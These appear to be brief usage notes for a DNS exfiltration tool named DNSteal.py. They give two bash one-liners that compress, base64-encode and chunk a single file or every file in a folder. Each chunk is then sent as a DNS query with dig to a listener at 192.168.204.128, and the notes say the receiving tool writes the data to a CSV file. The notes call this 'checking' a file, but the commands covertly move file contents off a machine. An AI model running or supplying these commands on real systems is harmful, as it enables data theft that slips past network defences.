(For DNSteal.py)
Command to check specific file
f=file.txt; s=4;b=57;c=0; for r in $(for i in $(gzip -c $f| base64 -w0 | sed "s/.\{$b\}/&\n/g");do if [[ "$c" -lt "$s"  ]]; then echo -ne "$i-."; c=$(($c+1)); else echo -ne "\n$i-."; c=1; fi; done ); do dig @192.168.204.128 `echo -ne $r$f|tr "+" "*"` +short; done


Command to check specific folder
for f in $(ls .); do s=4;b=57;c=0; for r in $(for i in $(gzip -c $f| base64 -w0 | sed "s/.\{$b\}/&\n/g");do if [[ "$c" -lt "$s"  ]]; then echo -ne "$i-."; c=$(($c+1)); else echo -ne "\n$i-."; c=1; fi; done ); do dig @192.168.204.128 `echo -ne $r$f|tr "+" "*"` +short; done ; done

dnsteal will generate into an csv file.

-------------------------------------------------------------------------------------------------------------------------------------------------------
(For Network_Scan.py)

